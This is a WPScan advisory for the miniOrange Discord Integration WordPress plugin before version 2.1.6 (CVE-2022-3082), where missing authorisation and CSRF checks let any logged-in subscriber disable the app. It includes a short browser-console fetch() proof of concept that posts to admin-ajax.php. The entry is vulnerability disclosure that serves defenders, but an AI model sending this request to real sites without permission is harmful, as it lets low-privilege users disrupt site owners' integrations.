WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

miniOrange Discord Integration < 2.1.6 - Subscriber+ App Disabling

Description

The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=mo_discord_disable_app&app_name=test',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

miniorange-discord-integration
Fixed in version 2.1.6

References

CVE
CVE-2022-3082

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
a91d0501-c2a9-4c6c-b5da-b3fc29442a4f

Timeline

Publicly Published

2022-09-26 (about 8 months ago)

Added

2022-09-26 (about 8 months ago)

Last Updated

2022-09-26 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin